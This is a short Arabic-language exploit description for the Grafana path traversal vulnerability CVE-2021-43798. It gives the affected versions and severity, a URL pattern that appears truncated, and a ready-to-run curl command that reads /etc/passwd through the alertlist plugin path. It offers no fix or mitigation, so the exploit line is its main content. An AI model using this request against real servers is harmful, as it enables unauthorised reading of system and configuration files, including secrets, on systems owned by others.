
استغلال لثغرة اجتياز الدليل في Grafana (CVE-2021-43798) تسمح بقراءة ملفات غير مصرح بها عبر طلبات HTTP مصممة.
الإصدارات المتأثرة: Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصححة)
نوع الثغرة: Directory Traversal (التنقل عبر الدلائل)
مستوى التأثير: حرج (Critical)
المنصة: Grafana (منصة مراقبة ومراقبة مفتوحة المصدر)
⚠️ تفاصيل الثغرة يمكن تنفيذ اجتياز الدليل في Grafana عبر عنوان URL التالي:
الكود
http://<grafana_host>/public/plugins// من خلال ذلك، يمكن للمهاجم قراءة الملفات المحلية على الخادم. على سبيل المثال، /etc/passwd أو الوصول غير المصرح به إلى ملفات التكوين.
🔥 مثال على الاستغلال قراءة ملف عبر طلب بسيط:
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
من خلال الطلب أعلاه، يمكن الحصول على قائمة مستخدمي نظام Linux.